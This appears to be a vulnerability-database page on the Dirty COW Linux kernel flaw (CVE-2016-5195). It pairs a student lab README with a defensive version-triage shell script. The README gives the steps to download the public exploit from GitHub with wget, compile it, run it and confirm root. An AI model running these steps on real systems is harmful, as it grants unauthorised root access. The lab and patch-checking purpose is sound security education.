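Associated vulnerability
Title: Linux kernel race condition vulnerability (CVE-2016-5195)
Description: The Linux kernel is the kernel used by Linux, the open-source operating system of the Linux Foundation (USA). A race condition vulnerability exists in the mm/gup.c file in Linux kernel 2.x through 4.x versions before 4.8.3. The vulnerability stems from the program not correctly handling writes to read-only memory mappings by the copy-on-write (COW) feature. A local attacker can exploit this vulnerability to gain privileges.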
Description
Linux privilege escalation using Dirty COW exploit (CVE-2016-5195).
Introduction
# Linux Privilege Escalation (Dirty COW – CVE-2016-5195)
## Project Overview
This project demonstrates privilege escalation on a vulnerable Linux kernel using the **Dirty COW exploit (CVE-2016-5195)**.
By exploiting a race condition in the kernel’s memory handling, a normal user was able to escalate privileges to **root access**.
---
## Tools & Environment
- Vulnerable Linux VM (e.g., Metasploitable2 or custom kernel)
- Dirty COW exploit (C source code)
- GCC (GNU Compiler Collection)
---
## Steps & Methodology
**1. Check kernel version (confirm vulnerability):**
```sh
uname -r
```
**2. Download Dirty COW exploit code:**
```sh
wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c -O dirty.c
```
**3. Compile the exploit:**
```sh
gcc -pthread dirty.c -o dirty -lcrypt
```
**4. Execute the exploit to escalate privileges:**
```sh
./dirty
```
**5. Verify root access:**
```sh
whoami
id
```
---
## Learning Outcomes
- Practical experience in Linux privilege escalation.
- Understanding kernel-level vulnerabilities and exploitation.
- Importance of regular patching & kernel hardening to defend against such attacks.
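
A version-only triage check for patch audits, added here as an example (it is not part of the original README or of the exploit project). It uses the affected range stated in the vulnerability description on this page (2.x through 4.x before 4.8.3); the function name, result labels and sample release strings are constructed for illustration.

```sh
#!/bin/sh
# Added example: compare a kernel release string against the upstream fix
# version given on this page for CVE-2016-5195 (4.8.3).
FIX_MAJOR=4; FIX_MINOR=8; FIX_PATCH=3

# dirtycow_triage [release]  (hypothetical helper; defaults to `uname -r`)
# Prints: in-affected-range | at-or-above-fix | outside-stated-range | unparseable
dirtycow_triage() {
    release=${1:-$(uname -r)}
    # Keep only the leading "N.N.N" part: "4.4.0-21-generic" -> "4.4.0"
    ver=${release%%[!0-9.]*}
    old_ifs=$IFS; IFS=.
    set -- $ver
    IFS=$old_ifs
    major=${1:-}; minor=${2:-0}; patch=${3:-0}
    # Reject anything that did not yield purely numeric fields
    for field in "$major" "$minor" "$patch"; do
        case $field in
            ''|*[!0-9]*) echo "unparseable"; return 0 ;;
        esac
    done
    # The page states the range starts at 2.x
    if [ "$major" -lt 2 ]; then
        echo "outside-stated-range"; return 0
    fi
    # Lexicographic comparison of (major, minor, patch) against the fix
    if [ "$major" -lt "$FIX_MAJOR" ] ||
       { [ "$major" -eq "$FIX_MAJOR" ] && [ "$minor" -lt "$FIX_MINOR" ]; } ||
       { [ "$major" -eq "$FIX_MAJOR" ] && [ "$minor" -eq "$FIX_MINOR" ] &&
         [ "$patch" -lt "$FIX_PATCH" ]; }; then
        echo "in-affected-range"
    else
        echo "at-or-above-fix"
    fi
}

# Constructed sample release strings, then the running kernel
for r in 2.6.24-16-server 4.4.0-21-generic 4.8.2 4.8.3 5.15.0-91-generic; do
    printf '%-22s %s\n' "$r" "$(dirtycow_triage "$r")"
done
printf '%-22s %s\n' "running: $(uname -r)" "$(dirtycow_triage)"
```

Distribution kernels often carry the fix as a backport without changing the upstream version number, so treat `in-affected-range` as a prompt to check the vendor's advisory for the installed kernel package, not as confirmation. `uname -r` reports the running kernel, which can lag behind an installed update until the host is rebooted.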
File snapshot
[4.0K] /data/pocs/5a4606612375e30684bc235fc543829fc7d5d637
└── [1.2K] README.md
0 directories, 1 file